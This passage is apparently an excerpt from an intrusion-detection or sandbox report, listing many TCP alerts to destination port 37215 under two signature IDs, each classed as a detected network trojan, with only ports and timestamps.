                SID:2835222
                Source Port:51822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551448
                SID:2835222
                Source Port:36262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900369
                SID:2835222
                Source Port:45938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665495
                SID:2829579
                Source Port:59194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001388
                SID:2829579
                Source Port:35732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088510
                SID:2829579
                Source Port:59638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506922
                SID:2829579
                Source Port:54730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862952
                SID:2835222
                Source Port:47370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732356
                SID:2829579
                Source Port:34444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418981
                SID:2835222
                Source Port:51840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858506
                SID:2829579
                Source Port:38222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959542
                SID:2829579
                Source Port:42858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455039
                SID:2829579
                Source Port:46892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210794
                SID:2835222
                Source Port:35686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179624
                SID:2835222
                Source Port:46714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738198
                SID:2835222
                Source Port:48682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.974912
                SID:2835222
                Source Port:36070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179132
                SID:2835222
                Source Port:54786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574685
                SID:2829579
                Source Port:55034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586605
                SID:2835222
                Source Port:58942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014554
                SID:2829579
                Source Port:46192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899083
                SID:2829579
                Source Port:54066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520969
                SID:2835222
                Source Port:47298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669303
                SID:2829579
                Source Port:35288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231444
                SID:2835222
                Source Port:49016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899294
                SID:2835222
                Source Port:47964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320942
                SID:2829579
                Source Port:48806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520351
                SID:2829579
                Source Port:48604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141298
                SID:2835222
                Source Port:41526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990302
                SID:2829579
                Source Port:46812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571510
                SID:2835222
                Source Port:49338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264911
                SID:2835222
                Source Port:48416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856169
                SID:2835222
                Source Port:51468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165749
                SID:2829579
                Source Port:36276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.068094
                SID:2835222
                Source Port:59260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358792
                SID:2829579
                Source Port:38694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548690
                SID:2835222
                Source Port:38746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.109192
                SID:2835222
                Source Port:52180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612147
                SID:2835222
                Source Port:51106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177874
                SID:2835222
                Source Port:34992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088241
                SID:2835222
                Source Port:32852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.279359
                SID:2835222
                Source Port:46680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897469
                SID:2835222
                Source Port:45108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943212
                SID:2829579
                Source Port:41566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.132624
                SID:2835222
                Source Port:40596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552198
                SID:2835222
                Source Port:36618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893982
                SID:2835222
                Source Port:37458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871560
                SID:2829579
                Source Port:57502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911234
                SID:2835222
                Source Port:35124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977643
                SID:2829579
                Source Port:50968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717262
                SID:2835222
                Source Port:53704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981488
                SID:2829579
                Source Port:44962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177343
                SID:2835222
                Source Port:56146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519885
                SID:2835222
                Source Port:60594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437855
                SID:2835222
                Source Port:60182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858223
                SID:2829579
                Source Port:54402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504281
                SID:2835222
                Source Port:43480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281774
                SID:2829579
                Source Port:58948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712740
                SID:2829579
                Source Port:56146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776654
                SID:2835222
                Source Port:33642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043971
                SID:2835222
                Source Port:53712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668041
                SID:2835222
                Source Port:50828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520184
                SID:2829579
                Source Port:52142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853306
                SID:2829579
                Source Port:37072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612552
                SID:2835222
                Source Port:36494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616035
                SID:2829579
                Source Port:42954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958192
                SID:2829579
                Source Port:54162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561982
                SID:2829579
                Source Port:47550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.451367
                SID:2835222
                Source Port:42932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873011
                SID:2829579
                Source Port:48502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374227
                SID:2829579
                Source Port:50634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583936
                SID:2829579
                Source Port:45504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900407
                SID:2835222
                Source Port:41408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515750
                SID:2829579
                Source Port:53490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042949
                SID:2835222
                Source Port:57346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026681
                SID:2835222
                Source Port:48254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598217
                SID:2835222
                Source Port:55144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227867
                SID:2835222
                Source Port:56224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559816
                SID:2829579
                Source Port:49012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564995
                SID:2835222
                Source Port:57626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441067
                SID:2835222
                Source Port:41696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575826
                SID:2829579
                Source Port:52478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787075
                SID:2835222
                Source Port:50528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944499
                SID:2829579
                Source Port:33446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.378859
                SID:2835222
                Source Port:59826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466305
                SID:2835222
                Source Port:51292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508790
                SID:2835222
                Source Port:51990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518933
                SID:2829579
                Source Port:40396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243560
                SID:2835222
                Source Port:43800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841298
                SID:2835222
                Source Port:54144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.240717
                SID:2829579
                Source Port:55542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928830
                SID:2835222
                Source Port:46956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225650
                SID:2835222
                Source Port:49540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573939
                SID:2829579
                Source Port:50582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948180
                SID:2829579
                Source Port:53788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385742
                SID:2835222
                Source Port:40332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928645
                SID:2835222
                Source Port:59316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422231
                SID:2829579
                Source Port:43616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288365
                SID:2829579
                Source Port:51966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521734
                SID:2829579
                Source Port:52946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686842
                SID:2835222
                Source Port:59696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886294
                SID:2829579
                Source Port:53620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.869131
                SID:2835222
                Source Port:40516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630050
                SID:2829579
                Source Port:59320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521670
                SID:2835222
                Source Port:37470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686787
                SID:2835222
                Source Port:44556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873504
                SID:2829579
                Source Port:34980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910860
                SID:2829579
                Source Port:36528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662118
                SID:2829579
                Source Port:44626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166274
                SID:2829579
                Source Port:43170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014977
                SID:2829579
                Source Port:54844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358696
                SID:2835222
                Source Port:50276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264825
                SID:2829579
                Source Port:57876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184624
                SID:2829579
                Source Port:41674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836821
                SID:2835222
                Source Port:56556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977283
                SID:2829579
                Source Port:54568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.428285
                SID:2835222
                Source Port:47334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669545
                SID:2835222
                Source Port:36954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448620
                SID:2835222
                Source Port:51130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166121
                SID:2835222
                Source Port:35120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790953
                SID:2835222
                Source Port:50464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466161
                SID:2829579
                Source Port:37522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854869
                SID:2829579
                Source Port:60642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464086
                SID:2835222
                Source Port:55430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455139
                SID:2829579
                Source Port:52674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165844
                SID:2835222
                Source Port:51864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319358
                SID:2829579
                Source Port:40274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.724559
                SID:2835222
                Source Port:49188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721590
                SID:2835222
                Source Port:41976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763861
                SID:2829579
                Source Port:35832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097463
                SID:2829579
                Source Port:33264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175556
                SID:2835222
                Source Port:44318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864401
                SID:2829579
                Source Port:45724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154548
                SID:2829579
                Source Port:48574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860781
                SID:2829579
                Source Port:54114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014667
                SID:2835222
                Source Port:33068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.516089
                SID:2829579
                Source Port:45956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655982
                SID:2835222
                Source Port:37582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384355
                SID:2829579
                Source Port:35338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810429
                SID:2829579
                Source Port:42162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862195
                SID:2835222
                Source Port:52936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681774
                SID:2835222
                Source Port:38616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652523
                SID:2829579
                Source Port:52484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.920120
                SID:2835222
                Source Port:47662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175123
                SID:2835222
                Source Port:36418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038226
                SID:2835222
                Source Port:44654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721853
                SID:2835222
                Source Port:37772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931234
                SID:2835222
                Source Port:60642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992746
                SID:2835222
                Source Port:43652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026537
                SID:2829579
                Source Port:59554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673384
                SID:2835222
                Source Port:38316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639729
                SID:2829579
                Source Port:56180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586817
                SID:2829579
                Source Port:41778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266643
                SID:2829579
                Source Port:47590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855967
                SID:2835222
                Source Port:57614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945858
                SID:2835222
                Source Port:45220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361302
                SID:2835222
                Source Port:39912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227227
                SID:2829579
                Source Port:60994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965308
                SID:2835222
                Source Port:38982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179860
                SID:2835222
                Source Port:39832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782567
                SID:2829579
                Source Port:37300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731621
                SID:2835222
                Source Port:41900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266478
                SID:2829579
                Source Port:34036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325452
                SID:2829579
                Source Port:44922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325587
                SID:2835222
                Source Port:55912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155108
                SID:2829579
                Source Port:42506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.941306
                SID:2829579
                Source Port:33016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243363
                SID:2835222
                Source Port:59096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649739
                SID:2835222
                Source Port:42524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935778
                SID:2829579
                Source Port:39022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372348
                SID:2829579
                Source Port:43642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.733808
                SID:2835222
                Source Port:46164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359651
                SID:2829579
                Source Port:48158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914659
                SID:2835222
                Source Port:41964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182452
                SID:2829579
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231181
                SID:2835222
                Source Port:58528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.093994
                SID:2835222
                Source Port:60134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.610344
                SID:2829579
                Source Port:49250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037842
                SID:2829579
                Source Port:34314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631595
                SID:2835222
                Source Port:58516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.907589
                SID:2829579
                Source Port:36890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878655
                SID:2829579
                Source Port:58516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149278
                SID:2829579
                Source Port:36068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434576
                SID:2835222
                Source Port:33010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.875013
                SID:2835222
                Source Port:58876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713714
                SID:2829579
                Source Port:52030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946369
                SID:2835222
                Source Port:36354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279301
                SID:2829579
                Source Port:52136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557218
                SID:2835222
                Source Port:46622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665086
                SID:2829579
                Source Port:59750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685573
                SID:2829579
                Source Port:60018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781326
                SID:2835222
                Source Port:50074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865489
                SID:2829579
                Source Port:45948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243454
                SID:2835222
                Source Port:55306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688133
                SID:2829579
                Source Port:46342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814961
                SID:2829579
                Source Port:51446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858671
                SID:2835222
                Source Port:48160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596814
                SID:2835222
                Source Port:40016
                Destination Port:37215
